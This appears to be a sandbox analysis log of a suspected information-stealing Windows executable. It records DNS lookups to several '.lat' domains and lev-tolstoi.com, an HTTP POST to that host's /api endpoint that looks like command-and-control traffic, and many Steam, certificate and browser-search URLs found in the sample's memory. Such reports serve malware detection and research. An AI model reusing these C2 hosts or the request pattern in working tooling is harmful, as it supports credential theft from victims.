                Source: global trafficDNS traffic detected: DNS query: curverpluch.lat
                Source: global trafficDNS traffic detected: DNS query: tentabatte.lat
                Source: global trafficDNS traffic detected: DNS query: bashfulacid.lat
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowere
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1514353743.0000000005CCA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488959320.0000000001360000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1515928263.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488193272.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565220310.0000000001360000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1513284186.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539309056.0000000001360000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstati
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1516348850.0000000005CB8000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1541193562.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1565070208.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1540810685.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1542630820.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1516290444.0000000005CB6000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1539246157.0000000005CB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1465201943.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465087302.0000000005C5C000.00000004.00000800.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1465001687.0000000005C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steam
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1488231577.000000000131E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.F
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=englis
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/s
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.00000000012DC000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&a
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1466309055.000000000135D000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1466220436.000000000131E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1438106482.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437953868.000000000132E000.00000004.00000020.00020000.00000000.sdmp, 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: 4KDKJjRzm8.exe, 00000000.00000003.1437919303.000000000136D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
